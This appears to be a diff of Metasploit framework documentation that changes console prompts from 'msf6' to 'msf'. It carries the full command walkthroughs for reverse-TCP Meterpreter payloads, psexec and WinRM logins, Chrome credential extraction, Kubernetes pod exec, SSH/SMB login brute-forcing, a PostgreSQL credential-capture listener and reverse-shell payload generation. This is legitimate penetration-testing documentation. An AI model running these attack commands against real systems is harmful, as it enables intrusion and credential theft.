-msf6 exploit(multi/handler) > favorite -d
+msf exploit(multi/handler) > favorite -d
 [*] Removing exploit/multi/handler from the favorite modules file
 ```

 #### Specifying module(s) to delete

 ```shell
-msf6 > favorite -d exploit/multi/handler exploit/windows/smb/psexec
+msf > favorite -d exploit/multi/handler exploit/windows/smb/psexec
 [*] Removing exploit/multi/handler from the favorite modules file
 [*] Removing exploit/windows/smb/psexec from the favorite modules file
 ```
@@ -74,7 +74,7 @@ msf6 > favorite -d exploit/multi/handler exploit/windows/smb/psexec
 #### Clearing the favorites list

 ```msf
-msf6 > show favorites
+msf > show favorites

 Favorites
 =========
@@ -84,9 +84,9 @@ Favorites
   0  exploit/multi/handler                        manual  No     Generic Payload Handler
   1  exploit/windows/smb/psexec  1999-01-01       manual  No     Microsoft Windows Authenticated User Code Execution

-msf6 > favorite -c
+msf > favorite -c
 [+] Favorite modules file cleared
-msf6 > show favorites
+msf > show favorites
 [!] The favorite modules file is empty
 ```

@@ -95,7 +95,7 @@ msf6 > show favorites
 The list of favorite modules can be printed by supplying the `-l` flag. This is an alias for the `show favorites` and `favorites` commands.

 ```shell
-msf6 > favorite -l
+msf > favorite -l

 Favorites
 =========
@@ -104,4 +104,4 @@ Favorites
   -  ----                        ---------------  ----    -----  -----------
   0  exploit/multi/handler                        manual  No     Generic Payload Handler
   1  exploit/windows/smb/psexec  1999-01-01       manual  No     Microsoft Windows Authenticated User Code Execution
-```
+```
@@ -352,19 +352,19 @@ end
 The module will start the http server and print the repo to clone

 ```msf
-msf6 > use exploit/multi/http/git_clone_test
+msf > use exploit/multi/http/git_clone_test
 [*] No payload configured, defaulting to cmd/unix/python/meterpreter/reverse_tcp
-msf6 exploit(multi/http/git_clone_test) > set srvport 9999
+msf exploit(multi/http/git_clone_test) > set srvport 9999
 srvport => 9999
-msf6 exploit(multi/http/git_clone_test) > set lhost 192.168.140.1
+msf exploit(multi/http/git_clone_test) > set lhost 192.168.140.1
 lhost => 192.168.140.1
-msf6 exploit(multi/http/git_clone_test) > set srvhost 192.168.140.1
+msf exploit(multi/http/git_clone_test) > set srvhost 192.168.140.1
 srvhost => 192.168.140.1
-msf6 exploit(multi/http/git_clone_test) > run
+msf exploit(multi/http/git_clone_test) > run
 [*] Exploit running as background job 0.
 [*] Exploit completed, but no session was created.

-msf6 exploit(multi/http/git_clone_test) > [*] Started reverse TCP handler on 192.168.140.1:4444 
+msf exploit(multi/http/git_clone_test) > [*] Started reverse TCP handler on 192.168.140.1:4444 
 [*] Using URL: http://192.168.140.1:9999/MOYuJfC
 [*] Server started.
 [*] Git repository to clone: http://192.168.140.1:9999/y-find.git
@@ -5,18 +5,18 @@ and should not be used during normal operations. These modules also as part of t
 By default the test modules in Metasploit are not loaded when Metasploit starts. To load them, run `loadpath test/modules` after which you should see output similar to the following:

 ```msf
-msf6 > loadpath test/modules
+msf > loadpath test/modules
 Loaded 38 modules:
    14 auxiliary modules
    13 exploit modules
    11 post modules
-msf6 > 
+msf > 
 ```

 The modules can be searched for:

 ```msf
-msf6 > search post/test
+msf > search post/test

 Matching Modules
 ================
@@ -35,8 +35,8 @@ Matching Modules
 Example of running the test module against an opened session:

 ```
-msf6 > use post/test/cmd_exec
-msf6 post(test/cmd_exec) > run session=-1
+msf > use post/test/cmd_exec
+msf post(test/cmd_exec) > run session=-1
 ...
 [*] Testing complete in 2.04 seconds
 [*] Passed: 6; Failed: 0; Skipped: 0
@@ -47,7 +47,7 @@ The `post/test/all` module is an aggregate module that can be used to quickly ru
 against a currently open session:

 ```msf
-msf6 post(test/all) > run session=-1
+msf post(test/all) > run session=-1

 [*] Applicable modules:
 Valid modules for x86/windows session 1
@@ -7,7 +7,7 @@ When you have a number of sessions open, searching can be a useful tool to navig
 You can get a list of sessions matching a specific criteria within msfconsole:

 ```msf
-msf6 payload(windows/meterpreter/reverse_http) > sessions --search "session_id:1 session_id:2"
+msf payload(windows/meterpreter/reverse_http) > sessions --search "session_id:1 session_id:2"
 Active sessions
 ===============

@@ -20,7 +20,7 @@ Active sessions
 Currently, the only supported keywords for search are `session_id`, `session_type`, and `last_checkin`. These keywords can be combined to further filter your results, and used with other flags. For example:

 ```msf
-msf6 payload(windows/meterpreter/reverse_http) > sessions --search "session_id:1 session_type:meterpreter last_checkin:greater_than:10s last_checkin:less_than:10d5h2m30s" -v
+msf payload(windows/meterpreter/reverse_http) > sessions --search "session_id:1 session_type:meterpreter last_checkin:greater_than:10s last_checkin:less_than:10d5h2m30s" -v

 Active sessions
 ===============
@@ -45,7 +45,7 @@ Of note in the above example, `last_checkin` requires an extra argument. The sec
 If `--search` is used in conjunction with `--kill-all`, it will restrict the latter function to only the search results. For example:

 ```msf
-msf6 payload(windows/meterpreter/reverse_http) > sessions -K -S "session_type:meterpreter"
+msf payload(windows/meterpreter/reverse_http) > sessions -K -S "session_type:meterpreter"
 [*] Killing matching sessions...

 Active sessions
@@ -58,5 +58,5 @@ Active sessions

 [*] 192.168.2.132 - Meterpreter session 1 closed.
 [*] 192.168.2.132 - Meterpreter session 2 closed.
-msf6 payload(windows/meterpreter/reverse_http) >
+msf payload(windows/meterpreter/reverse_http) >
 ```
@@ -30,7 +30,7 @@ In both scenarios, reports will be generated and written to disk that can be ope
 The `time` command in msfconsole can be used to record the performance of a command:

 ```msf
-msf6 exploit(windows/smb/ms17_010_psexec) > time reload
+msf exploit(windows/smb/ms17_010_psexec) > time reload
 [*] Reloading module...
 [+] Command "reload" completed in 0.20876399998087436 seconds
 ```
@@ -38,7 +38,7 @@ msf6 exploit(windows/smb/ms17_010_psexec) > time reload
 It is possible to record CPU and memory usage with the `--memory` and `--cpu` flags:

 ```msf
-msf6 exploit(windows/smb/ms17_010_psexec) > time --cpu search smb
+msf exploit(windows/smb/ms17_010_psexec) > time --cpu search smb
 ... etc ...
 Generating CPU dump /var/folders/wp/fp12h8q13kq7mvf4mll72c140000gq/T/msf-profile-2023030711505620230307-77101-4josw1/cpu
 [+] Command "search smb" completed in 0.4150249999947846 seconds
@@ -42,7 +42,7 @@ Creating initial database schema
 This looks like a lot of information, but all it's saying is that it's creating the database Metasploit will use to store information.  If you start up msfconsole now it should automatically connect to the database, and if you run `db_status` you should see something like this:

 ```
-msf6 > db_status
+msf > db_status
 [*] Connected to msf. Connection type: postgresql.
 ```

@@ -11,7 +11,7 @@ Note that any port can be used to run an application which communicates via HTTP
 This document is generic advice for running and debugging HTTP based Metasploit modules, but it is best to use a Metasploit module which is specific to the application that you are pentesting. For instance:

 ```msf
-msf6 > search tomcat http
+msf > search tomcat http
 ```

 ### HTTP Examples
@@ -49,12 +49,12 @@ run http://example.com HttpTrace=true verbose=true
 For instance:

 ```msf
-msf6 > use scanner/http/title
-msf6 auxiliary(scanner/http/title) > set RHOSTS 127.0.0.1
+msf > use scanner/http/title
+msf auxiliary(scanner/http/title) > set RHOSTS 127.0.0.1
 RHOSTS => 127.0.0.1
-msf6 auxiliary(scanner/http/title) > set HttpTrace true
+msf auxiliary(scanner/http/title) > set HttpTrace true
 HttpTrace => true
-msf6 auxiliary(scanner/http/title) > run
+msf auxiliary(scanner/http/title) > run

 ####################
 # Request:
@@ -89,7 +89,7 @@ Content-Length: 178
 [+] [127.0.0.1:80] [C:200] [R:] [S:SimpleHTTP/0.6 Python/2.7.16] Directory listing for /
 [*] Scanned 1 of 1 hosts (100% complete)
 [*] Auxiliary module execution completed
-msf6 auxiliary(scanner/http/title) >
+msf auxiliary(scanner/http/title) >
 ```

 To send all HTTP requests through a proxy, i.e. through Burp Suite:
@@ -170,13 +170,13 @@ Header-Name-Here: <%= 'content of header goes here' %>

 The following output shows leveraging the scraper scanner module with an additional header stored in ```additional_headers.txt```.
 ```msf
-msf6 auxiliary(scanner/http/scraper) > cat additional_headers.txt
+msf auxiliary(scanner/http/scraper) > cat additional_headers.txt
 [*] exec: cat additional_headers.txt

 X-Cookie-Header: <%= 'example-cookie' %>
-msf6 auxiliary(scanner/http/scraper) > set HTTPRAWHEADERS additional_headers.txt
+msf auxiliary(scanner/http/scraper) > set HTTPRAWHEADERS additional_headers.txt
 HTTPRAWHEADERS => additional_headers.txt
-msf6 auxiliary(scanner/http/scraper) > exploit
+msf auxiliary(scanner/http/scraper) > exploit

 ####################
 # Request:
@@ -9,7 +9,7 @@ a compromised docker container, or external to the cluster if the required APIs
 In the future there may be more modules than listed here, for the full list of modules run the `search` command within msfconsole:

 ```msf
-msf6 > search kubernetes
+msf > search kubernetes
 ```

 ### Lab Environment
@@ -41,12 +41,12 @@ run session=-1
 If the Kubernetes API is publicly accessible and you have a JWT Token:

 ```msf
-msf6 > use cloud/kubernetes/enum_kubernetes
-msf6 auxiliary(cloud/kubernetes/enum_kubernetes) > set RHOST https://kubernetes.docker.internal:6443
+msf > use cloud/kubernetes/enum_kubernetes
+msf auxiliary(cloud/kubernetes/enum_kubernetes) > set RHOST https://kubernetes.docker.internal:6443
 RHOST => https://kubernetes.docker.internal:6443
-msf6 auxiliary(cloud/kubernetes/enum_kubernetes) > set TOKEN eyJhbGciO...
+msf auxiliary(cloud/kubernetes/enum_kubernetes) > set TOKEN eyJhbGciO...
 TOKEN => eyJhbGciO...
-msf6 auxiliary(cloud/kubernetes/enum_kubernetes) > run
+msf auxiliary(cloud/kubernetes/enum_kubernetes) > run
 [*] Running module against 127.0.0.1

 [+] Kubernetes service version: {"major":"1","minor":"21","gitVersion":"v1.21.2","gitCommit":"092fbfbf53427de67cac1e9fa54aaa09a28371d7","gitTreeState":"clean","buildDate":"2021-06-16T12:53:14Z","goVersion":"go1.16.5","compiler":"gc","platform":"linux/amd64"}
@@ -68,7 +68,7 @@ Namespaces
 By default the `run` command will enumerate all resources available, but you can also specify which actions you would like to perform:

 ```msf
-msf6 auxiliary(cloud/kubernetes/enum_kubernetes) > show actions
+msf auxiliary(cloud/kubernetes/enum_kubernetes) > show actions

 Auxiliary actions:

@@ -115,9 +115,9 @@ If you have a Meterpreter session on a compromised Kubernetes container with the
 will be gathered from the session host automatically. The `TOKEN` will be read from the mounted `/run/secrets/kubernetes.io/serviceaccount/token` file if available:

 ```msf
-msf6 exploit(multi/kubernetes/exec) > set TARGET Interactive\ WebSocket
+msf exploit(multi/kubernetes/exec) > set TARGET Interactive\ WebSocket
 TARGET => Interactive WebSocket
-msf6 exploit(multi/kubernetes/exec) > run RHOST="" RPORT="" POD="" SESSION=-1
+msf exploit(multi/kubernetes/exec) > run RHOST="" RPORT="" POD="" SESSION=-1

 [*] Routing traffic through session: 1
 [+] Kubernetes service host: 10.96.0.1:443
@@ -137,19 +137,19 @@ pwd
 If the Kubernetes API is available remotely, the RHOST values and token can be set manually. In this scenario a token is manually specified, to execute a Python Meterpreter payload within the `thinkphp-67f7c88cc9-tgpfh` pod:

 ```msf
-msf6 > use exploit/multi/kubernetes/exec
+msf > use exploit/multi/kubernetes/exec
 [*] Using configured payload python/meterpreter/reverse_tcp
-msf6 exploit(multi/kubernetes/exec) > set TOKEN eyJhbGciOiJSUzI1...
+msf exploit(multi/kubernetes/exec) > set TOKEN eyJhbGciOiJSUzI1...
 TOKEN => eyJhbGciOiJSUzI1...
-msf6 exploit(multi/kubernetes/exec) > set POD thinkphp-67f7c88cc9-tgpfh
+msf exploit(multi/kubernetes/exec) > set POD thinkphp-67f7c88cc9-tgpfh
 POD => thinkphp-67f7c88cc9-tgpfh
-msf6 exploit(multi/kubernetes/exec) > set RHOSTS 192.168.159.31
+msf exploit(multi/kubernetes/exec) > set RHOSTS 192.168.159.31
 RHOSTS => 192.168.159.31
-msf6 exploit(multi/kubernetes/exec) > set TARGET Python
+msf exploit(multi/kubernetes/exec) > set TARGET Python
 TARGET => Python
-msf6 exploit(multi/kubernetes/exec) > set PAYLOAD python/meterpreter/reverse_tcp
+msf exploit(multi/kubernetes/exec) > set PAYLOAD python/meterpreter/reverse_tcp
 PAYLOAD => python/meterpreter/reverse_tcp
-msf6 exploit(multi/kubernetes/exec) > run
+msf exploit(multi/kubernetes/exec) > run

 [*] Started reverse TCP handler on 192.168.159.128:4444
 [*] Sending stage (39736 bytes) to 192.168.159.31
@@ -164,5 +164,5 @@ Architecture : x64
 Meterpreter  : python/linux
 meterpreter > background
 [*] Backgrounding session 1...
-msf6 exploit(multi/kubernetes/exec) >
+msf exploit(multi/kubernetes/exec) >
 ```
@@ -44,7 +44,7 @@ run ldap://domain.local;Administrator:p4$$w0rd@192.168.123.13/dc=domain,dc=local
 Example output:

 ```msf
-msf6 auxiliary(gather/ldap_query) > run rhost=192.168.123.13 username=Administrator@domain.local password=p4$$w0rd action=ENUM_ACCOUNTS
+msf auxiliary(gather/ldap_query) > run rhost=192.168.123.13 username=Administrator@domain.local password=p4$$w0rd action=ENUM_ACCOUNTS
 [*] Running module against 192.168.123.13

 [*] Discovering base DN automatically
@@ -112,8 +112,8 @@ Details on the Kerberos specific option names are documented in [[Kerberos Servi
 Query LDAP for accounts:

 ```msf
-msf6 > use auxiliary/gather/ldap_query
-msf6 auxiliary(gather/ldap_query) > run action=ENUM_ACCOUNTS rhost=192.168.123.13 username=Administrator password=p4$$w0rd ldap::auth=kerberos ldap::rhostname=dc3.demo.local domain=demo.local domaincontrollerrhost=192.168.123.13
+msf > use auxiliary/gather/ldap_query
+msf auxiliary(gather/ldap_query) > run action=ENUM_ACCOUNTS rhost=192.168.123.13 username=Administrator password=p4$$w0rd ldap::auth=kerberos ldap::rhostname=dc3.demo.local domain=demo.local domaincontrollerrhost=192.168.123.13
 [*] Running module against 192.168.123.13

 [+] 192.168.123.13:88 - Received a valid TGT-Response
@@ -11,13 +11,13 @@ MSSQL is frequently found on port on the following ports:
 For a full list of MSSQL modules run the `search` command within msfconsole:

 ```msf
-msf6 > search mssql
+msf > search mssql
 ```

 Or to search for modules that work with a specific session type:

 ```msf
-msf6 > search session_type:mssql
+msf > search session_type:mssql
 ```

 ### Lab Environment
@@ -61,7 +61,7 @@ on a successful login:
 Which you can interact with using `sessions -i <session id>` or `sessions -i -1` to interact with the most recently opened session.

 ```msf
-msf6 auxiliary(scanner/mssql/mssql_login) > sessions
+msf auxiliary(scanner/mssql/mssql_login) > sessions

 Active sessions
 ===============
@@ -70,7 +70,7 @@ Active sessions
  --  ----  ----   -----------                      ----------
  1         mssql  MSSQL test @ 192.168.2.242:1433  192.168.2.1:60963 -> 192.168.23.242:1433 (192.168.2.242)

-msf6 auxiliary(scanner/mssql/mssql_login) > sessions -i 1
+msf auxiliary(scanner/mssql/mssql_login) > sessions -i 1
 [*] Starting interaction with 1...

 mssql @ 192.168.2.242:1433 (master) > query 'select @@version;'
@@ -146,7 +146,7 @@ This session also works with the following modules:
 To interact directly with the session as if in a SQL prompt, you can use the `query` command.

 ```msf
-msf6 auxiliary(scanner/mssql/mssql_login) > sessions -i -1
+msf auxiliary(scanner/mssql/mssql_login) > sessions -i -1
 [*] Starting interaction with 2...

 mssql @ 192.168.2.242:1433 (master) > query -h
@@ -224,8 +224,8 @@ Details on the Kerberos specific option names are documented in [[Kerberos Servi
 Connect to a Microsoft SQL Server instance and run a query:

 ```msf
-msf6 > use auxiliary/admin/mssql/mssql_sql
-msf6 auxiliary(admin/mssql/mssql_sql) > run 192.168.123.13 domaincontrollerrhost=192.168.123.13 username=administrator password=p4$$w0rd mssql::auth=kerberos mssql::rhostname=dc3.demo.local mssqldomain=demo.local sql='select auth_scheme from sys.dm_exec_connections where session_id=@@spid'
+msf > use auxiliary/admin/mssql/mssql_sql
+msf auxiliary(admin/mssql/mssql_sql) > run 192.168.123.13 domaincontrollerrhost=192.168.123.13 username=administrator password=p4$$w0rd mssql::auth=kerberos mssql::rhostname=dc3.demo.local mssqldomain=demo.local sql='select auth_scheme from sys.dm_exec_connections where session_id=@@spid'
 [*] Reloading module...
 [*] Running module against 192.168.123.13

@@ -14,13 +14,13 @@ Metasploit has support for multiple MySQL modules, including:
 There are more modules than listed here, for the full list of modules run the `search` command within msfconsole:

 ```msf
-msf6 > search mysql
+msf > search mysql
 ```

 Or to search for modules that work with a specific session type:

 ```msf
-msf6 > search session_type:mysql
+msf > search session_type:mysql
 ```

 ### Lab Environment
@@ -92,15 +92,15 @@ for the MySQL client you're connecting to. The run command with CreateSession
 set to true should give you an interactive session:

 ```msf
-msf6 > use scanner/mysql/mysql_login 
-msf6 auxiliary(scanner/mysql/mysql_login) > run rhost=127.0.0.1 rport=4306 username=root password=password createsession=true
+msf > use scanner/mysql/mysql_login 
+msf auxiliary(scanner/mysql/mysql_login) > run rhost=127.0.0.1 rport=4306 username=root password=password createsession=true

 [+] 127.0.0.1:4306        - 127.0.0.1:4306 - Found remote MySQL version 11.2.2
 [+] 127.0.0.1:4306        - 127.0.0.1:4306 - Success: 'root:password'
 [*] MySQL session 1 opened (127.0.0.1:53241 -> 127.0.0.1:4306) at 2024-03-12 12:40:46 -0500
 [*] 127.0.0.1:4306        - Scanned 1 of 1 hosts (100% complete)
 [*] Auxiliary module execution completed
-msf6 auxiliary(scanner/mysql/mysql_login) > sessions -i -1
+msf auxiliary(scanner/mysql/mysql_login) > sessions -i -1
 [*] Starting interaction with 1...

 mysql @ 127.0.0.1:4306 >
@@ -110,7 +110,7 @@ You can interact with your new session using `sessions -i -1` or `sessions <sess
 You can also use `help` to get more information about how to use your session.

 ```msf
-msf6 auxiliary(scanner/mysql/mysql_login) > sessions
+msf auxiliary(scanner/mysql/mysql_login) > sessions

 Active sessions
 ===============
@@ -120,7 +120,7 @@ Active sessions
  2         mssql  MSSQL test @ 192.168.2.242:1433  192.168.2.1:61428 -> 192.168.2.242:1433 (192.168.2.242)
  3         mysql  MySQL root @ 127.0.0.1:4306      127.0.0.1:61450 -> 127.0.0.1:4306 (127.0.0.1)

-msf6 auxiliary(scanner/mysql/mysql_login) > sessions -i 3
+msf auxiliary(scanner/mysql/mysql_login) > sessions -i 3
 [*] Starting interaction with 3...
 ```

@@ -7,7 +7,7 @@ Metasploit post modules replace old Meterpreter scripts, which are no longer mai
 You can search for post gather modules within msfconsole:

 ```msf
-msf6 > search type:post platform:windows name:gather
+msf > search type:post platform:windows name:gather

 Matching Modules
 ================
@@ -26,8 +26,8 @@ There are two ways to launch a Post module, both require an existing session.
 Within a msf prompt you can use the `use` command followed by the `run` command to execute the module against the required session. For instance to extract credentials from Chrome on the most recently opened Metasploit session:

 ```msf
-msf6 > use post/windows/gather/enum_chrome
-msf6 post(windows/gather/enum_chrome) > run session=-1 verbose=true
+msf > use post/windows/gather/enum_chrome
+msf post(windows/gather/enum_chrome) > run session=-1 verbose=true

 [*] Impersonating token: 7192
 [*] Running as user 'DESKTOP-N3MAG5R\basic_user'...
@@ -44,13 +44,13 @@ msf6 post(windows/gather/enum_chrome) > run session=-1 verbose=true
 [+] Decrypted data: url:https://www.example.com/ my_username:my_password_123
 [+] Decrypted data saved in: /Users/user/.msf4/loot/20220422122129_default_192.168.123.151_chrome.decrypted_981698.txt
 [*] Post module execution completed
-msf6 post(windows/gather/enum_chrome) >
+msf post(windows/gather/enum_chrome) >
 ```

 Or within a Meterpreter prompt use the `run` command, which will automatically set the module's session value:

 ```msf
-msf6 > sessions --interact -1
+msf > sessions --interact -1
 [*] Starting interaction with 5...

 meterpreter > run post/windows/gather/enum_applications
@@ -14,13 +14,13 @@ Metasploit has support for multiple PostgreSQL modules, including:
 There are more modules than listed here, for the full list of modules run the `search` command within msfconsole:

 ```msf
-msf6 > search postgres
+msf > search postgres
 ```

 Or to search for modules that work with a specific session type:

 ```msf
-msf6 > search session_type:postgres
+msf > search session_type:postgres
 ```


@@ -95,7 +95,7 @@ set to true should give you an interactive session.
 For example:

 ```msf
-msf6 auxiliary(scanner/postgres/postgres_login) > run rhost=127.0.0.1 rport=5432 username=postgres password=password database=template1 createsession=true
+msf auxiliary(scanner/postgres/postgres_login) > run rhost=127.0.0.1 rport=5432 username=postgres password=password database=template1 createsession=true
 ```

 Should yield:
@@ -111,7 +111,7 @@ You can interact with your session using `sessions -i -1` or `sessions <session
 Use the help command for more info.

 ```msf
-msf6 auxiliary(scanner/postgres/postgres_login) > sessions
+msf auxiliary(scanner/postgres/postgres_login) > sessions

 Active sessions
 ===============
@@ -120,7 +120,7 @@ Active sessions
  --  ----  ----        -----------                           ----------
  1         postgresql  PostgreSQL postgres @ 127.0.0.1:5432  127.0.0.1:61324 -> 127.0.0.1:5432 (127.0.0.1)

-msf6 auxiliary(scanner/postgres/postgres_login) > sessions -i 1
+msf auxiliary(scanner/postgres/postgres_login) > sessions -i 1
 [*] Starting interaction with 1...
 ```

@@ -257,7 +257,7 @@ psql postgres://postgres:mysecretpassword@localhost:5432
 Metasploit's output will be:

 ```msf
-msf6 auxiliary(server/capture/postgresql) >
+msf auxiliary(server/capture/postgresql) >
 [*] Started service listener on 0.0.0.0:5432
 [*] Server started.
 [+] PostgreSQL LOGIN 127.0.0.1:60406 postgres / mysecretpassword / postgres
@@ -24,13 +24,13 @@ Metasploit has support for multiple SMB modules, including:
 There are more modules than listed here, for the full list of modules run the `search` command within msfconsole:

 ```msf
-msf6 > search smb
+msf > search smb
 ```

 Or to search for modules that work with a specific session type:

 ```msf
-msf6 > search session_type:smb
+msf > search session_type:smb
 ```

 ### Lab Environment
@@ -75,7 +75,7 @@ When using the smb_login module, the CreateSession option can be used to obtain
 session within the smb instance. Running with the following options:

 ```msf
-msf6 auxiliary(scanner/smb/smb_login) > run CreateSession=true RHOSTS=172.14.2.164 RPORT=445 SMBDomain=windomain.local SMBPass=password SMBUser=username
+msf auxiliary(scanner/smb/smb_login) > run CreateSession=true RHOSTS=172.14.2.164 RPORT=445 SMBDomain=windomain.local SMBPass=password SMBUser=username
 ```

 Should give you output similar to 
@@ -86,14 +86,14 @@ Should give you output similar to
 [*] SMB session 1 opened (172.16.158.1:62793 -> 172.14.2.164:445) at 2024-03-12 17:03:09 +0000
 [*] 172.14.2.164:445    - Scanned 1 of 1 hosts (100% complete)
 [*] Auxiliary module execution completed
-msf6 auxiliary(scanner/smb/smb_login) > sessions -i -1
+msf auxiliary(scanner/smb/smb_login) > sessions -i -1
 [*] Starting interaction with 1...
 ```

 Which you can interact with using `sessions -i <session id>` or `sessions -i -1` to interact with the most recently opened session.

 ```msf
-msf6 auxiliary(scanner/smb/smb_login) > sessions -i -1
+msf auxiliary(scanner/smb/smb_login) > sessions -i -1
 [*] Starting interaction with 1...

 SMB (172.14.2.164) > shares
@@ -315,8 +315,8 @@ Details on the Kerberos specific option names are documented in [[Kerberos Servi
 Running psexec against a host:

 ```msf
-msf6 > use exploit/windows/smb/psexec
-msf6 exploit(windows/smb/psexec) > run rhost=192.168.123.13 username=Administrator password=p4$$w0rd smb::auth=kerberos domaincontrollerrhost=192.168.123.13 smb::rhostname=dc3.demo.local domain=demo.local
+msf > use exploit/windows/smb/psexec
+msf exploit(windows/smb/psexec) > run rhost=192.168.123.13 username=Administrator password=p4$$w0rd smb::auth=kerberos domaincontrollerrhost=192.168.123.13 smb::rhostname=dc3.demo.local domain=demo.local

 [*] Started reverse TCP handler on 192.168.123.1:4444
 [*] 192.168.123.13:445 - Connecting to the server...
@@ -12,7 +12,7 @@ Metasploit has support for multiple SSH modules, including:
 There are more modules than listed here, for the full list of modules run the `search` command within msfconsole:

 ```msf
-msf6 > search ssh
+msf > search ssh
 ```

 ### Lab Environment
@@ -61,8 +61,8 @@ docker run --rm -it --publish 127.0.0.1:2222:22 ssh_lab:latest
 It should now be possible to test the SSH login from msfconsole:

 ```msf
-msf6 > use scanner/ssh/ssh_login
-msf6 auxiliary(scanner/ssh/ssh_login) > run ssh://test_user:password123@127.0.0.1:2222
+msf > use scanner/ssh/ssh_login
+msf auxiliary(scanner/ssh/ssh_login) > run ssh://test_user:password123@127.0.0.1:2222

 [*] 127.0.0.1:2222 - Starting bruteforce
 [+] 127.0.0.1:2222 - Success: 'test_user:password123' 'uid=700(test_user) gid=700(test_user) groups=700(test_user),700(test_user) Linux 5a26fe63abef 5.10.25-linuxkit #1 SMP Tue Mar 23 09:27:39 UTC 2021 x86_64 Linux '
@@ -3,7 +3,7 @@
 Each Metasploit module has a set of options which must be set before running. These can be seen with the `show options` or `options` command:

 ```msf
-msf6 exploit(windows/smb/ms17_010_eternalblue) > options
+msf exploit(windows/smb/ms17_010_eternalblue) > options

 Module options (exploit/windows/smb/ms17_010_eternalblue):

@@ -36,7 +36,7 @@ Exploit target:
 Each Metasploit module also has _advanced_ options, which can often be useful for fine-tuning modules, in particular setting connection timeouts values can be useful:

 ```msf
-msf6 exploit(windows/smb/ms17_010_eternalblue) > advanced
+msf exploit(windows/smb/ms17_010_eternalblue) > advanced

 Module advanced options (exploit/windows/smb/ms17_010_eternalblue):

@@ -61,7 +61,7 @@ Payload advanced options (windows/x64/meterpreter/reverse_tcp):
 You can see which options stilloptions to be set with the `show missing` command:

 ```msf
-msf6 exploit(windows/smb/ms17_010_eternalblue) > show missing
+msf exploit(windows/smb/ms17_010_eternalblue) > show missing

 Module options (exploit/windows/smb/ms17_010_eternalblue):

@@ -41,7 +41,7 @@ Metasploit has support for multiple WinRM modules, including:
 There are more modules than listed here, for the full list of modules run the `search` command within msfconsole:

 ```msf
-msf6 > search winrm
+msf > search winrm
 ```

 ### Lab Environment
@@ -70,7 +70,7 @@ run https://192.168.123.139:5986
 Example:

 ```msf
-msf6 auxiliary(scanner/winrm/winrm_auth_methods) > run http://192.168.123.139:5985
+msf auxiliary(scanner/winrm/winrm_auth_methods) > run http://192.168.123.139:5985

 [+] 192.168.123.139:5985: Negotiate protocol supported
 [+] 192.168.123.139:5985: Kerberos protocol supported
@@ -123,14 +123,14 @@ run http://user:pass@192.168.123.139:5985
 Example:

 ```msf
-msf6 auxiliary(scanner/winrm/winrm_login) > run http://user:pass@192.168.123.139:5985
+msf auxiliary(scanner/winrm/winrm_login) > run http://user:pass@192.168.123.139:5985

 [!] No active DB -- Credential data will not be saved!
 [+] 192.168.123.139:5985 - Login Successful: WORKSTATION\user:pass
 [*] Command shell session 7 opened (192.168.123.1:58673 -> 192.168.123.139:5985 ) at 2022-04-23 02:36:34 +0100
 [*] Scanned 1 of 1 hosts (100% complete)
 [*] Auxiliary module execution completed
-msf6 auxiliary(scanner/winrm/winrm_login) > sessions -i -1
+msf auxiliary(scanner/winrm/winrm_login) > sessions -i -1
 [*] Starting interaction with 7...

 Microsoft Windows [Version 10.0.14393]
@@ -146,8 +146,8 @@ Details on the Kerberos specific option names are documented in [[Kerberos Servi
 Open a WinRM session:

 ```msf
-msf6 > use auxiliary/scanner/winrm/winrm_login
-msf6 auxiliary(scanner/winrm/winrm_login) > run rhost=192.168.123.13 username=Administrator password=p4$$w0rd winrm::auth=kerberos domaincontrollerrhost=192.168.123.13 winrm::rhostname=dc3.demo.local domain=demo.local
+msf > use auxiliary/scanner/winrm/winrm_login
+msf auxiliary(scanner/winrm/winrm_login) > run rhost=192.168.123.13 username=Administrator password=p4$$w0rd winrm::auth=kerberos domaincontrollerrhost=192.168.123.13 winrm::rhostname=dc3.demo.local domain=demo.local

 [+] 192.168.123.13:88 - Received a valid TGT-Response
 [*] 192.168.123.13:5985   - TGT MIT Credential Cache ticket saved to /Users/user/.msf4/loot/20230118120604_default_192.168.123.13_mit.kerberos.cca_451736.bin
@@ -159,7 +159,7 @@ msf6 auxiliary(scanner/winrm/winrm_login) > run rhost=192.168.123.13 username=Ad
 [*] Command shell session 1 opened (192.168.123.1:50722 -> 192.168.123.13:5985) at 2023-01-18 12:06:05 +0000
 [*] Scanned 1 of 1 hosts (100% complete)
 [*] Auxiliary module execution completed
-msf6 auxiliary(scanner/winrm/winrm_login) > sessions -i -1
+msf auxiliary(scanner/winrm/winrm_login) > sessions -i -1
 [*] Starting interaction with 1...

 Microsoft Windows [Version 10.0.14393]
@@ -61,7 +61,7 @@ When the user views the options for a given module, it will be consolidated. The
 Multiple options are available for configuring the module options:

 ```msf
-msf5 exploit(multi/http/tomcat_mgr_upload) > options
+msf exploit(multi/http/tomcat_mgr_upload) > options

 Module options (exploit/multi/http/tomcat_mgr_upload):

@@ -88,7 +88,7 @@ Exploit target:
 Multiple options are consolidated into a single TARGETS field:

 ```msf
-msf5 exploit(multi/http/tomcat_mgr_upload) > options
+msf exploit(multi/http/tomcat_mgr_upload) > options

 Module options (exploit/multi/http/tomcat_mgr_upload):

@@ -8,7 +8,7 @@ There are currently two main ways to debug Meterpreter sessions:
 This can be enabled for any Meterpreter session, and does not require a debug Metasploit build:

 ```msf
-msf6 > setg SessionTlvLogging true
+msf > setg SessionTlvLogging true
 SessionTlvLogging => true
 ```

@@ -62,7 +62,7 @@ The result of your registry queries can be impacted if you are interacting with
 You can see the type of session you currently have open with the `sessions` command:

 ```msf
-msf6 exploit(windows/smb/psexec) > sessions
+msf exploit(windows/smb/psexec) > sessions

 Active sessions
 ===============
@@ -46,18 +46,18 @@ execute code such as adding user accounts, or executing a simple pingback comman
 Payload modules can also be used individually to generate standalone executables, or shellcode for use within exploits:

 ```msf
-msf6 payload(linux/x86/shell_reverse_tcp) > back
-msf6 > use payload/linux/x86/shell_reverse_tcp
-msf6 payload(linux/x86/shell_reverse_tcp) > set lhost 127.0.0.1
+msf payload(linux/x86/shell_reverse_tcp) > back
+msf > use payload/linux/x86/shell_reverse_tcp
+msf payload(linux/x86/shell_reverse_tcp) > set lhost 127.0.0.1
 lhost => 127.0.0.1
-msf6 payload(linux/x86/shell_reverse_tcp) > set lport 4444
+msf payload(linux/x86/shell_reverse_tcp) > set lport 4444
 lport => 4444

 # Generate a payload for use within C
-msf6 payload(linux/x86/shell_reverse_tcp) > generate -f c
+msf payload(linux/x86/shell_reverse_tcp) > generate -f c

 # Generate an ELF file for execution on Linux environments
-msf6 payload(linux/x86/shell_reverse_tcp) > generate -f elf -o linux_shell
